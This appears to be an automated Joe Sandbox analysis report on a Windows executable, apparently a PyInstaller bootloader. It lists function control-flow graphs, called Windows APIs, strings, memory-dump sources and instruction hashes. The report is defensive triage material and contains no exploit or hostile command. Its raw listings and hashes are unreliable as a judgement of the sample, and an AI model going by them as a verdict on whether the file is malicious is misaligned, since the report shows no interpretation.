                                                                                                                                                                                                                                                            control_flow_graph 727 7ff6404fad6c-7ff6404fad92 728 7ff6404fad94-7ff6404fada8 call 7ff6404f43d4 call 7ff6404f43f4 727->728 729 7ff6404fadad-7ff6404fadb1 727->729 743 7ff6404fb19e 728->743 731 7ff6404fb187-7ff6404fb193 call 7ff6404f43d4 call 7ff6404f43f4 729->731 732 7ff6404fadb7-7ff6404fadbe 729->732 750 7ff6404fb199 call 7ff6404f9bf0 731->750 732->731 734 7ff6404fadc4-7ff6404fadf2 732->734 734->731 737 7ff6404fadf8-7ff6404fadff 734->737 740 7ff6404fae01-7ff6404fae13 call 7ff6404f43d4 call 7ff6404f43f4 737->740 741 7ff6404fae18-7ff6404fae1b 737->741 740->750 746 7ff6404fb183-7ff6404fb185 741->746 747 7ff6404fae21-7ff6404fae27 741->747 748 7ff6404fb1a1-7ff6404fb1b8 743->748 746->748 747->746 751 7ff6404fae2d-7ff6404fae30 747->751 750->743 751->740 752 7ff6404fae32-7ff6404fae57 751->752 755 7ff6404fae8a-7ff6404fae91 752->755 756 7ff6404fae59-7ff6404fae5b 752->756 760 7ff6404fae93-7ff6404faebb call 7ff6404fc90c call 7ff6404f9c58 * 2 755->760 761 7ff6404fae66-7ff6404fae7d call 7ff6404f43d4 call 7ff6404f43f4 call 7ff6404f9bf0 755->761 758 7ff6404fae82-7ff6404fae88 756->758 759 7ff6404fae5d-7ff6404fae64 756->759 763 7ff6404faf08-7ff6404faf1f 758->763 759->758 759->761 788 7ff6404faebd-7ff6404faed3 call 7ff6404f43f4 call 7ff6404f43d4 760->788 789 7ff6404faed8-7ff6404faf03 call 7ff6404fb594 760->789 792 7ff6404fb010 761->792 766 7ff6404faf21-7ff6404faf29 763->766 767 7ff6404faf9a-7ff6404fafa4 call 7ff640502c2c 763->767 766->767 771 7ff6404faf2b-7ff6404faf2d 766->771 779 7ff6404fb02e 767->779 780 7ff6404fafaa-7ff6404fafbf 767->780 771->767 776 7ff6404faf2f-7ff6404faf45 771->776 776->767 781 7ff6404faf47-7ff6404faf53 776->781 784 7ff6404fb033-7ff6404fb053 ReadFile 779->784 780->779 786 7ff6404fafc1-7ff6404fafd3 GetConsoleMode 780->786 781->767 782 7ff6404faf55-7ff6404faf57 781->782 782->767 787 7ff6404faf59-7ff6404faf71 782->787 790 7ff6404fb14d-7ff6404fb156 GetLastError 784->790 791 7ff6404fb059-7ff6404fb061 784->791 786->779 793 7ff6404fafd5-7ff6404fafdd 786->793 787->767 795 7ff6404faf73-7ff6404faf7f 787->795 788->792 789->763 800 7ff6404fb173-7ff6404fb176 790->800 801 7ff6404fb158-7ff6404fb16e call 7ff6404f43f4 call 7ff6404f43d4 790->801 791->790 797 7ff6404fb067 791->797 794 7ff6404fb013-7ff6404fb01d call 7ff6404f9c58 792->794 793->784 799 7ff6404fafdf-7ff6404fb001 ReadConsoleW 793->799 794->748 795->767 803 7ff6404faf81-7ff6404faf83 795->803 807 7ff6404fb06e-7ff6404fb083 797->807 809 7ff6404fb003 GetLastError 799->809 810 7ff6404fb022-7ff6404fb02c 799->810 804 7ff6404fb17c-7ff6404fb17e 800->804 805 7ff6404fb009-7ff6404fb00b call 7ff6404f4368 800->805 801->792 803->767 814 7ff6404faf85-7ff6404faf95 803->814 804->794 805->792 807->794 816 7ff6404fb085-7ff6404fb090 807->816 809->805 810->807 814->767 820 7ff6404fb092-7ff6404fb0ab call 7ff6404fa984 816->820 821 7ff6404fb0b7-7ff6404fb0bf 816->821 827 7ff6404fb0b0-7ff6404fb0b2 820->827 824 7ff6404fb0c1-7ff6404fb0d3 821->824 825 7ff6404fb13b-7ff6404fb148 call 7ff6404fa7c4 821->825 828 7ff6404fb0d5 824->828 829 7ff6404fb12e-7ff6404fb136 824->829 825->827 827->794 830 7ff6404fb0da-7ff6404fb0e1 828->830 829->794 832 7ff6404fb0e3-7ff6404fb0e7 830->832 833 7ff6404fb11d-7ff6404fb128 830->833 834 7ff6404fb103 832->834 835 7ff6404fb0e9-7ff6404fb0f0 832->835 833->829 837 7ff6404fb109-7ff6404fb119 834->837 835->834 836 7ff6404fb0f2-7ff6404fb0f6 835->836 836->834 838 7ff6404fb0f8-7ff6404fb101 836->838 837->830 839 7ff6404fb11b 837->839 838->837 839->829
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1983679219.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983626811.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983720990.00007FF64050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983759772.00007FF64051E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983759772.00007FF640524000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983825892.00007FF640526000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff6404e0000_rename_me_before.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 3215553584-0
                                                                                                                                                                                                                                                            • Opcode ID: 7e4b6968f21da67f115f2b5899b729ebe27c21aa0167ab1df282e77588440d71
                                                                                                                                                                                                                                                            • Instruction ID: 1befe4a4177dd3b3873daa27a92c6d9d73791894762db0d4e42a47cfc4a13dbd
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7e4b6968f21da67f115f2b5899b729ebe27c21aa0167ab1df282e77588440d71
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6FC10162A0C6A7F1EB64BB1494402BE37AAFB92BC0F550131EA5D877D1CF7CE8558740
                                                                                                                                                                                                                                                            Function 00007FF6404E7B50 Relevance: 10.6, APIs: 7, Instructions: 63COMMON
                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1983679219.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983626811.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983720990.00007FF64050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983759772.00007FF64051E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983759772.00007FF640524000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983825892.00007FF640526000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff6404e0000_rename_me_before.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Token$InformationProcess$CloseConvertCurrentErrorHandleLastOpenString
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 995526605-0
                                                                                                                                                                                                                                                            • Opcode ID: 62e4819b0c80cd137060bb94e6a3fe70b8e549ab62dcd95e051829f5e08db428
                                                                                                                                                                                                                                                            • Instruction ID: ac2e215d320ffff1b355f9a19b0d4e3315f0727fb6e3c8e833f686094dd3892a
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 62e4819b0c80cd137060bb94e6a3fe70b8e549ab62dcd95e051829f5e08db428
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0221A031A0CA5292EB20FB55E58462AB3A5EF917F4F200235EA7C83BE4DF7CD4858740
                                                                                                                                                                                                                                                            Function 00007FF6404E33E0 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 59COMMON
                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • GetModuleFileNameW.KERNEL32(?,00007FF6404E3534), ref: 00007FF6404E3411
                                                                                                                                                                                                                                                              • Part of subcall function 00007FF6404E29E0: GetLastError.KERNEL32(?,?,?,00007FF6404E342E,?,00007FF6404E3534), ref: 00007FF6404E2A14
                                                                                                                                                                                                                                                              • Part of subcall function 00007FF6404E29E0: FormatMessageW.KERNEL32(?,?,?,00007FF6404E342E), ref: 00007FF6404E2A7D
                                                                                                                                                                                                                                                              • Part of subcall function 00007FF6404E29E0: MessageBoxW.USER32 ref: 00007FF6404E2ACF
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1983679219.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983626811.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983720990.00007FF64050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983759772.00007FF64051E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983759772.00007FF640524000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983825892.00007FF640526000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff6404e0000_rename_me_before.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Message$ErrorFileFormatLastModuleName
                                                                                                                                                                                                                                                            • String ID: Failed to convert executable path to UTF-8.$Failed to obtain executable path.$Failed to resolve full path to executable %ls.$GetModuleFileNameW$\\?\
                                                                                                                                                                                                                                                            • API String ID: 517058245-2863816727
                                                                                                                                                                                                                                                            • Opcode ID: 4333ea13b7f7892cb13c7834fe0fbc8b7cb0659b0560af6bfa7ef98de9a8054c
                                                                                                                                                                                                                                                            • Instruction ID: 38c06243298b15ed8099fe7993e28303999cab98f5eaaac513a8b9e0303a0545
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4333ea13b7f7892cb13c7834fe0fbc8b7cb0659b0560af6bfa7ef98de9a8054c
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A121A461B1C563F1FE25FB24E9553BA1260BF49395F800236DA6DC67D6EE2CE504C780
                                                                                                                                                                                                                                                            Function 00007FF6404E8400 Relevance: 9.1, APIs: 2, Strings: 4, Instructions: 64COMMON
                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                              • Part of subcall function 00007FF6404E7B50: GetCurrentProcess.KERNEL32 ref: 00007FF6404E7B70
                                                                                                                                                                                                                                                              • Part of subcall function 00007FF6404E7B50: OpenProcessToken.ADVAPI32 ref: 00007FF6404E7B83
                                                                                                                                                                                                                                                              • Part of subcall function 00007FF6404E7B50: GetTokenInformation.KERNELBASE ref: 00007FF6404E7BA8
                                                                                                                                                                                                                                                              • Part of subcall function 00007FF6404E7B50: GetLastError.KERNEL32 ref: 00007FF6404E7BB2
                                                                                                                                                                                                                                                              • Part of subcall function 00007FF6404E7B50: GetTokenInformation.KERNELBASE ref: 00007FF6404E7BF2
                                                                                                                                                                                                                                                              • Part of subcall function 00007FF6404E7B50: ConvertSidToStringSidW.ADVAPI32 ref: 00007FF6404E7C0E
                                                                                                                                                                                                                                                              • Part of subcall function 00007FF6404E7B50: CloseHandle.KERNEL32 ref: 00007FF6404E7C26
                                                                                                                                                                                                                                                            • LocalFree.KERNEL32(?,00007FF6404E3814), ref: 00007FF6404E848C
                                                                                                                                                                                                                                                            • LocalFree.KERNEL32(?,00007FF6404E3814), ref: 00007FF6404E8495
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1983679219.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983626811.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983720990.00007FF64050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983759772.00007FF64051E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983759772.00007FF640524000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983825892.00007FF640526000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff6404e0000_rename_me_before.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Token$FreeInformationLocalProcess$CloseConvertCurrentErrorHandleLastOpenString
                                                                                                                                                                                                                                                            • String ID: D:(A;;FA;;;%s)$D:(A;;FA;;;%s)(A;;FA;;;%s)$S-1-3-4$Security descriptor string length exceeds PYI_PATH_MAX!
                                                                                                                                                                                                                                                            • API String ID: 6828938-1529539262
                                                                                                                                                                                                                                                            • Opcode ID: 3b4c49a148c6d93be49ada6c8446d085e6d181d97aae771454943d90599d7390
                                                                                                                                                                                                                                                            • Instruction ID: 2d982544cdd8630cc35464163c093093a424154aa6d2a0564f51409ab334d1d6
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3b4c49a148c6d93be49ada6c8446d085e6d181d97aae771454943d90599d7390
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 42215131A0C762E1FA54FB10E6153EA62A5FF89780F444035EA5D83796DF3CE944C790
                                                                                                                                                                                                                                                            Function 00007FF6404E7530 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 81COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • CreateDirectoryW.KERNELBASE(00000000,?,00007FF6404E324C,?,?,00007FF6404E3964), ref: 00007FF6404E7642
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1983679219.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983626811.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983720990.00007FF64050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983759772.00007FF64051E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983759772.00007FF640524000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983825892.00007FF640526000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff6404e0000_rename_me_before.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: CreateDirectory
                                                                                                                                                                                                                                                            • String ID: %.*s$%s%c$\
                                                                                                                                                                                                                                                            • API String ID: 4241100979-1685191245
                                                                                                                                                                                                                                                            • Opcode ID: 7bb6789f982dd078021ca405e37f28ebc21f271831f10c16ba6710f0d2331ec5
                                                                                                                                                                                                                                                            • Instruction ID: 9b46986936144f648d47a0e7b2a7a9439cf12a4469b86afd1b15c1f4fe323bbc
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7bb6789f982dd078021ca405e37f28ebc21f271831f10c16ba6710f0d2331ec5
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D131E821A1DAD2E5EA21FB25E8507EA6254FF94BF4F404231EE6D83BC9DF2CD6018740
                                                                                                                                                                                                                                                            Function 00007FF6404FC270 Relevance: 6.2, APIs: 4, Instructions: 218COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6404FC25B), ref: 00007FF6404FC38C
                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6404FC25B), ref: 00007FF6404FC417
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1983679219.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983626811.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983720990.00007FF64050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983759772.00007FF64051E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983759772.00007FF640524000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983825892.00007FF640526000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff6404e0000_rename_me_before.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: ConsoleErrorLastMode
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 953036326-0
                                                                                                                                                                                                                                                            • Opcode ID: 1f18d30cb6731d2276149ea46625d8d438ffcaf3b5eb5be8e43e25f336112fa7
                                                                                                                                                                                                                                                            • Instruction ID: 1ef1bf0e5bd98d2ff22e0bb385fbef1a6847c2f9b2b3b3861d2e4785353c280b
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1f18d30cb6731d2276149ea46625d8d438ffcaf3b5eb5be8e43e25f336112fa7
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D791C132E2C672E5F754FB6595502BD2BAAFB44B88F544139DE0EA6B84CF38E4418700
                                                                                                                                                                                                                                                            Function 00007FF6404FEC9C Relevance: 6.2, APIs: 4, Instructions: 161COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1983679219.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983626811.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983720990.00007FF64050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983759772.00007FF64051E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983759772.00007FF640524000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983825892.00007FF640526000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff6404e0000_rename_me_before.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: _get_daylight$_isindst
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 4170891091-0
                                                                                                                                                                                                                                                            • Opcode ID: fe74ad9a1dfbf97a60779a6b4eb4e3da65874cecf87de461c354fefb5b69a27d
                                                                                                                                                                                                                                                            • Instruction ID: 6c8a11fa80f40a1d9154d283d6d20dd15fa663ec68a0fae0f30d144cd09012e5
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: fe74ad9a1dfbf97a60779a6b4eb4e3da65874cecf87de461c354fefb5b69a27d
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5B51F972F0C122DAFB18FF6599456BC37AAAB1035AF500135DE1D96BE5DF38A642C700
                                                                                                                                                                                                                                                            Function 00007FF6404F4A8C Relevance: 6.1, APIs: 4, Instructions: 119pipeCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1983679219.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983626811.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983720990.00007FF64050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983759772.00007FF64051E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983759772.00007FF640524000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983825892.00007FF640526000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff6404e0000_rename_me_before.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: File$ErrorHandleInformationLastNamedPeekPipeType
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 2780335769-0
                                                                                                                                                                                                                                                            • Opcode ID: 1ec8bf387a2241cb1ee0019bb6bb5a321e30a3d38cbcbe421edb0c1d83f6d5d9
                                                                                                                                                                                                                                                            • Instruction ID: 75f6c3af5d72fd27f8e01d6fb3b6d0b9943f265b4ae43a3d0d96952bcbb00385
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1ec8bf387a2241cb1ee0019bb6bb5a321e30a3d38cbcbe421edb0c1d83f6d5d9
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5B516D22E0D661DAFB14FF71D4503BD27AAEB88B58F119535DE0987789DF38E4818740
                                                                                                                                                                                                                                                            Function 00007FF6404F4938 Relevance: 6.1, APIs: 4, Instructions: 90fileCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1983679219.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983626811.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983720990.00007FF64050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983759772.00007FF64051E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983759772.00007FF640524000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983825892.00007FF640526000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff6404e0000_rename_me_before.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: CloseCreateFileHandle_invalid_parameter_noinfo
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 1279662727-0
                                                                                                                                                                                                                                                            • Opcode ID: c9c3dc0ca6ff3025a18f37416ed5252826b5e2a6b8668c561ba6737191909872
                                                                                                                                                                                                                                                            • Instruction ID: b812c0209f54b6a60e057f1f873657876772e2061edb54fed5764d39b177f2ce
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c9c3dc0ca6ff3025a18f37416ed5252826b5e2a6b8668c561ba6737191909872
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: BE41B062E1C79293F354FB6095503696266FBD47A4F109334EAAC83BD1EF6CA1E08700
                                                                                                                                                                                                                                                            Function 00007FF6404EBF5C Relevance: 4.6, APIs: 3, Instructions: 94COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1983679219.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983626811.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983720990.00007FF64050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983759772.00007FF64051E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983759772.00007FF640524000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983825892.00007FF640526000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff6404e0000_rename_me_before.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_release_startup_lock
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 3251591375-0
                                                                                                                                                                                                                                                            • Opcode ID: 51e2e4cc4e0defacebf1dac919e01b91b6d5e84f1fe25dd37a2b49ce45fe95ab
                                                                                                                                                                                                                                                            • Instruction ID: 4535f9a2bdabda74afa0a46e2157a74f4d229af8e152e6f74e7c852a6d44e2ce
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 51e2e4cc4e0defacebf1dac919e01b91b6d5e84f1fe25dd37a2b49ce45fe95ab
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2B314D21E1C273E1FA54FBA495513B91382AF41389F440039EA5DCB7D3DE2DA9468781
                                                                                                                                                                                                                                                            Function 00007FF6404F8D48 Relevance: 4.5, APIs: 3, Instructions: 14COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1983679219.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983626811.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983720990.00007FF64050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983759772.00007FF64051E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983759772.00007FF640524000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983825892.00007FF640526000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff6404e0000_rename_me_before.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 1703294689-0
                                                                                                                                                                                                                                                            • Opcode ID: 824606f6feba241c18d37bd9947fb033388d99e3127919417550cde66a1966b4
